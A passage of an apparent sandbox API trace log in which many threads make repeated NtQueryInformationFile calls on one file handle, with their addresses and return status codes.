FileInformationClass=0x9 | out: IoStatusBlock=0x480fc08, FileInformation=0x44d8098) returned 0x0 Thread: id = 836 os_tid = 0x614 [0152.830] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fd90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fd90, FileInformation=0x44d8098) returned 0x0 Thread: id = 837 os_tid = 0x690 [0152.831] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf948, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf948, FileInformation=0x44d8098) returned 0x0 Thread: id = 838 os_tid = 0xa68 [0152.834] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fde0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fde0, FileInformation=0x44d8098) returned 0x0 Thread: id = 839 os_tid = 0x7d0 [0152.836] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f900, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f900, FileInformation=0x44d8098) returned 0x0 Thread: id = 840 os_tid = 0x7d8 [0152.841] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x435faf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x435faf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 841 os_tid = 0x24c [0152.842] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf808, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf808, FileInformation=0x44d8098) returned 0x0 Thread: id = 842 os_tid = 0x9f8 [0152.844] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490f9a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490f9a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 843 os_tid = 0x798 [0152.847] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fa80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fa80, FileInformation=0x44d8098) returned 0x0 Thread: id = 844 os_tid = 0xa3c [0152.848] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fd50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fd50, FileInformation=0x44d8098) returned 0x0 Thread: id = 845 os_tid = 0x8c0 [0152.850] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df7c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df7c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 846 os_tid = 0x708 [0152.852] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf8b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf8b0, FileInformation=0x44d8098) returned 0x0 Thread: id = 847 os_tid = 0xa64 [0152.854] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afb50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afb50, FileInformation=0x44d8098) returned 0x0 Thread: id = 848 os_tid = 0xa30 [0152.855] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fb70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fb70, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 849 os_tid = 0x388 [0152.859] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fa88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fa88, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 850 os_tid = 0x760 [0152.861] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fea8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fea8, FileInformation=0x44d8098) returned 0x0 Thread: id = 851 os_tid = 0xa54 [0152.863] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f788, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f788, FileInformation=0x44d8098) returned 0x0 Thread: id = 852 os_tid = 0x738 [0152.864] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efcc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efcc8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 853 os_tid = 0x488 [0152.866] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bff20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bff20, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 854 os_tid = 0x6dc [0152.868] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488f820, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488f820, FileInformation=0x44d8098) returned 0x0 Thread: id = 855 os_tid = 0x7a0 [0152.870] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fa98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fa98, FileInformation=0x44d8098) returned 0x0 Thread: id = 856 os_tid = 0x73c [0152.871] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fc10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fc10, FileInformation=0x44d8098) returned 0x0 Thread: id = 857 os_tid = 0x1c0 [0152.873] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fdb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fdb0, FileInformation=0x44d8098) returned 0x0 Thread: id = 858 os_tid = 0x7c4 [0152.875] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fc50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fc50, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 859 os_tid = 0x790 [0152.876] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efcd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efcd8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 860 os_tid = 0x688 [0152.878] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fca8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fca8, FileInformation=0x44d8098) returned 0x0 Thread: id = 861 os_tid = 0x240 [0152.880] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fdd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fdd8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 862 os_tid = 0x8e0 [0152.881] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff8d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff8d8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 863 os_tid = 0x880 [0152.883] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fe30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fe30, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 864 os_tid = 0x8f0 [0152.885] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fac0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fac0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 865 os_tid = 0xa18 [0152.886] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dff28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dff28, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 866 os_tid = 0x8a0 [0152.888] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fe78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fe78, FileInformation=0x44d8098) returned 0x0 Thread: id = 867 os_tid = 0x870 [0152.889] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffac8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffac8, FileInformation=0x44d8098) returned 0x0 Thread: id = 868 os_tid = 0x9a0 [0152.891] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fee8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fee8, FileInformation=0x44d8098) returned 0x0 Thread: id = 869 os_tid = 0x2c4 [0152.893] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f948, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f948, FileInformation=0x44d8098) returned 0x0 Thread: id = 870 os_tid = 0x890 [0152.895] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f940, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f940, FileInformation=0x44d8098) returned 0x0 Thread: id = 871 os_tid = 0x4e8 [0152.897] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fec8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fec8, FileInformation=0x44d8098) returned 0x0 Thread: id = 872 os_tid = 0xcc [0152.899] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fb60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fb60, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 873 os_tid = 0xd0 [0152.900] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dff08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dff08, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 874 os_tid = 0xd4 [0152.902] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bff38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bff38, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 875 os_tid = 0xd8 [0152.904] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fdf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fdf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 876 os_tid = 0xdc [0152.906] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fea8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fea8, FileInformation=0x44d8098) returned 0x0 Thread: id = 877 os_tid = 0xe0 [0152.907] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fa88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fa88, FileInformation=0x44d8098) returned 0x0 Thread: id = 878 os_tid = 0xe4 [0152.909] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fb98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fb98, FileInformation=0x44d8098) returned 0x0 Thread: id = 879 os_tid = 0xe8 [0152.910] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fb08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fb08, FileInformation=0x44d8098) returned 0x0 Thread: id = 880 os_tid = 0xec [0152.912] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efde8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efde8, FileInformation=0x44d8098) returned 0x0 Thread: id = 881 os_tid = 0x748 [0152.914] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f990, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f990, FileInformation=0x44d8098) returned 0x0 Thread: id = 882 os_tid = 0xc4 [0152.915] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fc20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fc20, FileInformation=0x44d8098) returned 0x0 Thread: id = 883 os_tid = 0x620 [0152.917] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfe20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfe20, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 884 os_tid = 0x910 [0152.919] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fa50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fa50, FileInformation=0x44d8098) returned 0x0 Thread: id = 885 os_tid = 0x950 [0152.921] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47af818, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47af818, FileInformation=0x44d8098) returned 0x0 Thread: id = 886 os_tid = 0x940 [0152.922] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfa68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfa68, FileInformation=0x44d8098) returned 0x0 Thread: id = 887 os_tid = 0x980 [0152.924] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fe18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fe18, FileInformation=0x44d8098) returned 0x0 Thread: id = 888 os_tid = 0xa10 [0152.927] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480f9c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480f9c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 889 os_tid = 0x72c [0152.929] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fd90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fd90, FileInformation=0x44d8098) returned 0x0 Thread: id = 890 os_tid = 0x9e0 [0152.930] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f958, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f958, FileInformation=0x44d8098) returned 0x0 Thread: id = 891 os_tid = 0x9c4 [0152.932] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efb98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efb98, FileInformation=0x44d8098) returned 0x0 Thread: id = 892 os_tid = 0xa6c [0152.934] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f920, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f920, FileInformation=0x44d8098) returned 0x0 Thread: id = 893 os_tid = 0xb00 [0152.936] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fbb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fbb0, FileInformation=0x44d8098) returned 0x0 Thread: id = 894 os_tid = 0xaf8 [0152.937] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fcc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fcc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 895 os_tid = 0xae4 [0152.939] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fa50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fa50, FileInformation=0x44d8098) returned 0x0 Thread: id = 896 os_tid = 0x344 [0152.941] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f9b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f9b8, FileInformation=0x44d8098) returned 0x0 Thread: id = 897 os_tid = 0x808 [0152.943] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fdd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fdd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 898 os_tid = 0x858 [0152.944] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488ff30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488ff30, FileInformation=0x44d8098) returned 0x0 Thread: id = 899 os_tid = 0x224 [0152.946] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fc00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fc00, FileInformation=0x44d8098) returned 0x0 Thread: id = 900 os_tid = 0x4dc [0152.949] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492ff50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492ff50, FileInformation=0x44d8098) returned 0x0 Thread: id = 901 os_tid = 0x78c [0152.950] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fc80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fc80, FileInformation=0x44d8098) returned 0x0 Thread: id = 902 os_tid = 0xb0 [0152.952] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf948, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf948, FileInformation=0x44d8098) returned 0x0 Thread: id = 903 os_tid = 0x314 [0152.954] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fd70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fd70, FileInformation=0x44d8098) returned 0x0 Thread: id = 904 os_tid = 0x804 [0152.955] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf910, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf910, FileInformation=0x44d8098) returned 0x0 Thread: id = 905 os_tid = 0x854 [0152.957] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef8e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef8e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 906 os_tid = 0xa78 [0152.959] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489ff18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489ff18, FileInformation=0x44d8098) returned 0x0 Thread: id = 907 os_tid = 0x6a8 [0152.961] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fc60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fc60, FileInformation=0x44d8098) returned 0x0 Thread: id = 908 os_tid = 0x7a8 [0152.962] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fe60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fe60, FileInformation=0x44d8098) returned 0x0 Thread: id = 909 os_tid = 0x330 [0152.964] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487ff30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487ff30, FileInformation=0x44d8098) returned 0x0 Thread: id = 910 os_tid = 0x3a4 [0152.966] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f930, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f930, FileInformation=0x44d8098) returned 0x0 Thread: id = 911 os_tid = 0x67c [0152.968] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490f930, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490f930, FileInformation=0x44d8098) returned 0x0 Thread: id = 912 os_tid = 0x5cc [0152.970] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfca8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfca8, FileInformation=0x44d8098) returned 0x0 Thread: id = 913 os_tid = 0x840 [0152.972] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef7c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef7c8, FileInformation=0x44d8098) returned 0x0 Thread: id = 914 os_tid = 0x69c [0152.982] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fba8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fba8, FileInformation=0x44d8098) returned 0x0 Thread: id = 915 os_tid = 0x6f0 [0152.983] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfa90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfa90, FileInformation=0x44d8098) returned 0x0 Thread: id = 916 os_tid = 0x810 [0152.985] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f7d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f7d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 917 os_tid = 0xa88 [0152.991] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fae8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fae8, FileInformation=0x44d8098) returned 0x0 Thread: id = 918 os_tid = 0x43c [0152.993] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efb90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efb90, FileInformation=0x44d8098) returned 0x0 Thread: id = 919 os_tid = 0x670 [0152.995] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffba8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffba8, FileInformation=0x44d8098) returned 0x0 Thread: id = 920 os_tid = 0xa14 [0152.998] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fa18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fa18, FileInformation=0x44d8098) returned 0x0 Thread: id = 921 os_tid = 0x990 [0153.000] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f8b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f8b0, FileInformation=0x44d8098) returned 0x0 Thread: id = 922 os_tid = 0x2dc [0153.002] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfb38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfb38, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 923 os_tid = 0x74c [0153.004] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fcc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fcc0, FileInformation=0x44d8098) returned 0x0 Thread: id = 924 os_tid = 0x3c4 [0153.006] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fad8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fad8, FileInformation=0x44d8098) returned 0x0 Thread: id = 925 os_tid = 0x90 [0153.008] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfa68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfa68, FileInformation=0x44d8098) returned 0x0 Thread: id = 926 os_tid = 0x630 [0153.010] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fde8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fde8, FileInformation=0x44d8098) returned 0x0 Thread: id = 927 os_tid = 0x124 [0153.014] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fc90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fc90, FileInformation=0x44d8098) returned 0x0 Thread: id = 928 os_tid = 0xc0 [0153.017] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fe50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fe50, FileInformation=0x44d8098) returned 0x0 Thread: id = 929 os_tid = 0x360 [0153.019] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478f878, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478f878, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 930 os_tid = 0x920 [0153.021] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efdd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efdd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 931 os_tid = 0xbec [0153.024] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f880, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f880, FileInformation=0x44d8098) returned 0x0 Thread: id = 932 os_tid = 0x6b8 [0153.026] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df988, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df988, FileInformation=0x44d8098) returned 0x0 Thread: id = 933 os_tid = 0x30c [0153.028] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f830, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f830, FileInformation=0x44d8098) returned 0x0 Thread: id = 934 os_tid = 0xbfc [0153.030] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fc88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fc88, FileInformation=0x44d8098) returned 0x0 Thread: id = 935 os_tid = 0x3f8 [0153.032] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fe70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fe70, FileInformation=0x44d8098) returned 0x0 Thread: id = 936 os_tid = 0x6cc [0153.035] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fc40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fc40, FileInformation=0x44d8098) returned 0x0 Thread: id = 937 os_tid = 0x830 [0153.037] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf818, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf818, FileInformation=0x44d8098) returned 0x0 Thread: id = 938 os_tid = 0x75c [0153.040] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47af7a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47af7a8, FileInformation=0x44d8098) returned 0x0 Thread: id = 939 os_tid = 0x7f0 [0153.042] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fb80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fb80, FileInformation=0x44d8098) returned 0x0 Thread: id = 940 os_tid = 0x710 [0153.044] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477ff70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477ff70, FileInformation=0x44d8098) returned 0x0 Thread: id = 941 os_tid = 0x5d8 [0153.045] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489ff10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489ff10, FileInformation=0x44d8098) returned 0x0 Thread: id = 942 os_tid = 0xbe4 [0153.048] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f9d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f9d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 943 os_tid = 0x600 [0153.050] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487ff20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487ff20, FileInformation=0x44d8098) returned 0x0 Thread: id = 944 os_tid = 0xbd0 [0153.052] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f908, FileInformation=0x44d8098, Length=0x10000, 